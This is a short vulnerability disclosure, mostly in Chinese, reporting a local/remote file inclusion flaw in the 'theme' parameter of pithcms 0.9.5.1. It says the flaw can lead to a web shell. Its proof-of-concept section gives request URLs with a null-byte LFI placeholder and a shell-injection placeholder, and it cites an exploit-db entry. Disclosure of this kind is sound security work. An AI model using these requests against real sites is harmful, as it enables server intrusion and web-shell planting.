pithcms是一个简单的Flat file内容管理系统。它具有所见即所得的编辑器、Flat File 数据库、动态菜单等。无需具备HTML、PHP知识，一键安装和升级。pithcms 0.9.5.1中index.php文件的theme参数存在远程/本地文件包含漏洞，可能导致攻击者获取WebShell。
注：Flat File是一种包含没有相对关系结构的记录的文件。这个类型通常用来描述文字处理、其他结构字符或标记被移除了的文本。Flat File的另一种形式是包含了用ASCII码记录的，每个表单元由逗号分隔，用行表示记录组的文件。这种文件页叫做用逗号分隔数值(CSV)的文件。

[+]info:
~~~~~~~~~
Title:pithcms (theme) Local / remote File inclusion VUlnerability
Version:0.9.5.1
download:http://sourceforge.net/projects/pithcms/files/
Author:eidelweiss
Contact:g1xsystem[at]windowslive.com

[+]poc:
~~~~~~~~~
http://127.0.0.1/path/index.php?theme= [LFI]%00
htp://127.0.0.1/path/index.php?theme= [inj3ct0r sh3ll]

[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/14271